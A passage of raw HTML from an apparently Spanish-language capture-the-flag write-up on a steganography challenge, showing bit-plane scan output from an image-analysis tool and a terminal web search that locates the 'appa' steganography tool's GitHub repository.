Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b5,r,msb,Xy,prime .. file: MPEG ADTS, layer II, v1, 48 kHz, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b6,r,msb,Xy,prime .. file: MPEG ADTS, layer I, v2, 112 kbps, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b6,rgb,msb,Xy,prime .. file: MPEG ADTS, layer I, v2, 112 kbps, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b7,r,lsb,Xy,prime .. file: , Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b7,rgb,lsb,Xy,prime .. file: , 48 kHz, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,g,msb,Xy,prime .. file: RDI Acoustic Doppler Current Profiler (ADCP)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,bgr,msb,Xy,prime .. file: RDI Acoustic Doppler Current Profiler (ADCP)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b1,r,lsb,yX .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"Q,</span><span style="background-color: #1e1e1e; color: #bd63c5; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">$PH0Il</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b1,bgr,lsb,yX .. file: PGP\011Secret Key -</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,r,msb,yX .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"WuUw]]uu_W}"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,g,msb,yX .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"]u]_w]WwUU"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b4,b,msb,yX .. file: MPEG ADTS, layer I, v2, 112 kbps, 24 kHz, JntStereo</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b5,b,lsb,yX .. file: MPEG ADTS, layer II, v1, JntStereo</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b6,bgr,msb,yX .. file: MPEG ADTS, layer I, v2, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b7,rgb,lsb,yX .. file: AIX core file fulldump 32-bit</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b7,bgr,lsb,yX .. file: , 48 kHz, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,g,msb,yX .. file: RDI Acoustic Doppler Current Profiler (ADCP)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,b,msb,yX .. file: ddis/ddif</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,rgb,msb,yX .. file: RDI Acoustic Doppler Current Profiler (ADCP)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,b,msb,yX,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"]UWUWU]]U"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,bgr,msb,yX,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"wU]W]]w}w]wuUw"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b3,rgb,lsb,yX,prime .. file: very old 16-bit-int big-endian archive</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b4,b,msb,yX,prime .. text: [</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"w"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> repeated 9 </span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">times</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">]</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b5,rgb,lsb,yX,prime .. file: MPEG ADTS, layer II, v1, 384 kbps, JntStereo</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b6,r,msb,yX,prime .. file: MPEG ADTS, layer I, v2, 112 kbps, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b6,g,msb,yX,prime .. file: MPEG ADTS, layer I, v2, 112 kbps, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b7,r,lsb,yX,prime .. file: , 48 kHz, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b7,g,lsb,yX,prime .. file: , 48 kHz, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,g,lsb,yX,prime .. file: AIX core file 64-bit</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,rgb,msb,yX,prime .. file: ddis/ddif</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,r,msb,Yx .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"u]UUWu}_"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,g,msb,Yx .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"uUWUUUUU]]"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,bgr,msb,Yx,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"Wu]_}u}}UW"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">...</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">#################################</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">########## stegano-red ##########</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">#################################</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">þÿþþÿþþþþÿþþþÿþþÿþþþþÿþþÿþþÿþþÿþþÿþþÿþþþþþÿþþÿÿþÿþþÿþþÿþþÿÿþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþþÿþþÿþþþþÿþþÿþþÿþþþÿþþÿþÿþþÿþþÿÿþÿþþÿÿþÿþþÿÿþÿÿþÿþþÿþþÿþþÿþþþÿþÿþþÿþþÿþþÿþþÿÿþþþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿþþÿÿþÿþþÿþþÿþþÿÿþÿþþÿþ</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">...</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Localizamos el repositorio de la herramienta “appa” con una simple búsqueda en google desde el terminal en </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://github.com/stncal/appa </span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~/CTF/CSACTF19/misc/stephanography</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># google site:github.com "stncal" "appa" steganography</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://github.com/stncal/appa</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://github.com/topics/steganography?l=python&o=desc&s=updated</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://github.com/stncal/appa/wiki</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://github.com/topics/steganography?o=desc&s=updated</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://npm.pkg.github.com/topics/steganography?o=desc&s=updated</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://github.com/notacatkiller?tab=stars</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://github.com/topics/steganography?utf8=%E2%9C%93&after=Y3Vyc29yOjYw</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://rubygems.pkg.github.com/topics/pillow?l=python&o=desc&s=updated</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
